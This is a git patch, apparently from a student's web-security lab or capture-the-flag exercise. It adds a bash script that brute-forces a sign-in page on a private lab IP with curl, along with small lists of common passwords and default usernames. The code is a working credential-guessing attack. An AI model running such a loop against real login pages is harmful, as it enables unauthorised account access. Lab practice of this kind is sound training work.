From 9ec822252921d3eb133f1653d751a290a5f84f00 Mon Sep 17 00:00:00 2001
From: tomoron <tomoron@student.42angouleme.fr>
Date: Thu, 10 Apr 2025 15:45:18 +0200
Subject: [PATCH] add bruteforce script

---
 Admin_sql_injection/ressources/bruteforce.sh | 16 ++++++++++++++++
 Admin_sql_injection/ressources/passwords.txt |  7 +++++++
 Admin_sql_injection/ressources/usernames.txt |  6 ++++++
 3 files changed, 29 insertions(+)
 create mode 100644 Admin_sql_injection/ressources/bruteforce.sh
 create mode 100644 Admin_sql_injection/ressources/passwords.txt
 create mode 100644 Admin_sql_injection/ressources/usernames.txt

diff --git a/Admin_sql_injection/ressources/bruteforce.sh b/Admin_sql_injection/ressources/bruteforce.sh
new file mode 100644
index 0000000..9edfb24
--- /dev/null
+++ b/Admin_sql_injection/ressources/bruteforce.sh
@@ -0,0 +1,16 @@
+
+test_url() {
+	echo "test user $1, pass $2"
+	curl "http://10.12.248.148/?page=signin&username=$1&Login=Login&password=$2" 2> /dev/null | grep -i flag
+	if [ $? -eq 0 ]; then
+		echo "FOUND"
+		exit
+	fi
+}
+
+while read -r username; do
+	while read -r password; do
+		test_url "$username" "$password"
+	done < passwords.txt
+done < usernames.txt
+
diff --git a/Admin_sql_injection/ressources/passwords.txt b/Admin_sql_injection/ressources/passwords.txt
new file mode 100644
index 0000000..2ba36ce
--- /dev/null
+++ b/Admin_sql_injection/ressources/passwords.txt
@@ -0,0 +1,7 @@
+password
+password1
+qwerty
+12345678
+shadow
+admin
+111111
diff --git a/Admin_sql_injection/ressources/usernames.txt b/Admin_sql_injection/ressources/usernames.txt
new file mode 100644
index 0000000..3d2b7f8
--- /dev/null
+++ b/Admin_sql_injection/ressources/usernames.txt
@@ -0,0 +1,6 @@
+root
+admin
+test
+guest
+info
+adm